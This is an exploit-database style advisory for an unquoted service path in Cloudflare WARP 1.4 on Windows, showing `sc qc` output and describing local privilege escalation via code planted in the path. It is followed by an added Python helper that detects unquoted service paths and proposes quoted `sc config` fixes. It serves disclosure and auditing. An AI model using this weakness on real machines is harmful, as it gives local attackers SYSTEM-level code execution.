<pre><code># Exploit Title: Cloudflare WARP 1.4 - Unquoted Service Path<br /># Date: 05/03/2022<br /># Exploit Author: Hejap Zairy<br /># Vendor Homepage: https://www.cloudflare.com/<br /># Software Link: https://developers.cloudflare.com/warp-client/get-started/windows/<br /># Version: 1.4.107<br /># Tested: Windows 10 Pro x64 es<br /><br />C:\Users\Hejap>sc qc CloudflareWARP<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: CloudflareWARP<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Cloudflare WARP<br /> DEPENDENCIES : wlansvc<br /> SERVICE_START_NAME : LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
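The Cloudflare WARP entry above and the Private Internet Access entry earlier on this page both hinge on one field of the sc qc output, BINARY_PATH_NAME. The Python below is an added audit helper and is not part of either advisory: it parses that output and applies the unquoted-path rule, then proposes the sc config form that re-registers the path quoted. SAMPLE_SC_QC reproduces the WARP output quoted above (including its doubled backslash), and PIA_PATH is the quoted path from the PIA entry, which the rule correctly leaves alone.

```python
"""
Audit helper for unquoted Windows service paths.

Added example, not part of either advisory on this page. The rule is the one
the advisories rely on: a BINARY_PATH_NAME that is not wrapped in quotes and
whose image path contains a space is ambiguous to the service control manager.
SAMPLE_SC_QC is the `sc qc CloudflareWARP` output quoted above; PIA_PATH is the
(quoted) path from the Private Internet Access entry.
"""
import re
from typing import Optional

# Split "C:\dir with space\svc.exe -k args" into the image and its trailing arguments.
EXE_RE = re.compile(r"^(?P<image>.*?\.exe)(?P<args>\s.*)?$", re.IGNORECASE)

SAMPLE_SC_QC = r"""
SERVICE_NAME: CloudflareWARP
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Cloudflare\Cloudflare WARP\\warp-svc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Cloudflare WARP
        DEPENDENCIES       : wlansvc
        SERVICE_START_NAME : LocalSystem
"""

PIA_PATH = r'"C:\Program Files\Private Internet Access\pia-service.exe"'


def is_unquoted_service_path(binary_path: str) -> bool:
    """True when the SCM would have to guess where the image path ends."""
    p = binary_path.strip()
    if not p or p.startswith('"'):
        return False  # quoted: unambiguous regardless of spaces
    m = EXE_RE.match(p)
    image = m.group("image") if m else p  # no .exe suffix: treat everything as the image
    return " " in image


def audit_sc_qc(sc_output: str) -> dict:
    """Pull the fields that matter out of `sc qc` output and rate the binary path."""
    def field(label: str) -> Optional[str]:
        m = re.search(re.escape(label) + r"\s*:\s*(.*)", sc_output)
        return m.group(1).strip() if m else None

    name = field("SERVICE_NAME")
    path = field("BINARY_PATH_NAME") or ""
    account = field("SERVICE_START_NAME")
    unquoted = is_unquoted_service_path(path)

    fix = None
    if unquoted:
        m = EXE_RE.match(path)
        image = m.group("image") if m else path
        args = (m.group("args") or "").strip() if m else ""
        # sc.exe expects the inner quotes escaped inside the binPath= argument.
        fix = f'sc config {name} binPath= "\\"{image}\\"' + (f" {args}" if args else "") + '"'

    return {
        "service": name,
        "path": path,
        "account": account,
        "runs_as_system": account == "LocalSystem",
        "unquoted": unquoted,
        "fix": fix,
    }


if __name__ == "__main__":
    result = audit_sc_qc(SAMPLE_SC_QC)
    for key, value in result.items():
        print(f"{key:15}: {value}")
    print(f"PIA path unquoted: {is_unquoted_service_path(PIA_PATH)}")
```

The `runs_as_system` field is there because the same ambiguity in a service running as a low-privileged account is a much smaller finding; both entries on this page show SERVICE_START_NAME as LocalSystem, which is what makes them worth a ticket.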